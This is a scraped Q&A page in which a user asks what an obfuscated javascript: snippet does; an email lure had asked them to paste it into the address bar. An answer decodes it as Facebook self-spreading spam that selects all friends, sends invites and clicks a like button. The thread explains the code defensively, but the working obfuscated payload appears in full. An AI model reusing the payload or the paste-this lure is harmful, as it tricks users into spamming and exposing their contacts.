Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

What does this code do

Tags:

javascript

Ok someone who happens to be a good friend of mine is sending me some odd emails lately one of which was a link to a page that asks you to copy and paste this in to your address bar in your browser then execute it ...

javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})();

Not being totally with it when it comes to low level programming i'm curious as to what the email is asking here ...

PLEASE DO NOT RUN THIS CODE UNLESS YOU ARE HAPPY THAT IT WILL NOT BREAK ANYTHING.

But ... Could someone tell me what it does?

like image 588
War Avatar asked May 24 '10 10:05

War


People also ask

What does this coding do?

Coding tells a machine which actions to perform and how to complete tasks. Programming languages provide the rules for building websites, apps, and other computer-based technologies. Each programming language helps humans accurately communicate with machines.

What does this code do Java?

Definition and Usage. The this keyword refers to the current object in a method or constructor. The most common use of the this keyword is to eliminate the confusion between class attributes and parameters with the same name (because a class attribute is shadowed by a method or constructor parameter).

What is the purpose of code?

Coding creates a set of instructions for computers to follow. These instructions determine what actions a computer can and cannot take. Coding allows programmers to build programs, such as websites and apps. Computer programmers can also tell computers how to process data in better, faster ways.


1 Answers

I haven't decoded completely the code, but here's a couple of hints to it.

The variable _0xc100 defines an array of strings. The character are encoded as hexadecimal, so it's more difficult to read them. So, for instance, \x76 equals "v".

You can safely alert(_0xc100); to see it in plain text.

var _0xc100 = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79", 
      "\x73\x74\x79\x6C\x65", 
      "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
      "\x68\x69\x64\x64\x65\x6E",
      "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
      "\x76\x61\x6C\x75\x65",
      "\x63\x6C\x69\x63\x6B",
      "\x73\x75\x67\x67\x65\x73\x74",
      "\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
      "\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
      "\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
      "\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",
      "\x6C\x69\x6B\x65\x6D\x65"];

translates to an array containing these keywords

visibility, style, getElementById, hidden, innerHTML, value, click, suggest, select_all,
sgm_invite_form, /ajax/social_graph/invite_dialog.php, submitDialog, likeme

Now, the following statements (DON'T EXECUTE THOSE) use these keywords to actually execute functions.

For instance:

d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];

is equivalent to (d is defined as document and mw is defined at the top)

document.getElementById("app125879300771588_mwrapper").style.visibility = "hidden";

which hides an element called app125879300771588_mwrapper

the following instructions give

document.getElementById("app125879300771588_jop").innerHTML = document.getElementById("app125879300771588_jode").value;

which copies the content of app125879300771588_jop into app125879300771588_jode

and

document.getElementById("suggest").click();

which I guess clicks some "suggest" button.

Finally, it sets 3 setTimeout functions, to execute 3 commands after 5 seconds (the 5000)

They translate to

setTimeout(function () {
    select_all();
     }, 5000);

Which I assume selects all your friends...

setTimeout(function () 
    {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
    }, 5000);

... send them invites

setTimeout(function () 
    {
    document.getElementById("likeme").click();
    document.getElementById("app125879300771588_ifo").innerHTML =
       document.getElementById("app125879300771588_ifc").value;
    }, 5000);

... and presses a like button

Note that I don't use Facebook, and I don't know the ins and outs of it but I guess it's pretty clear that this code is malicious.

like image 57
nico Avatar answered Oct 01 '22 09:10

nico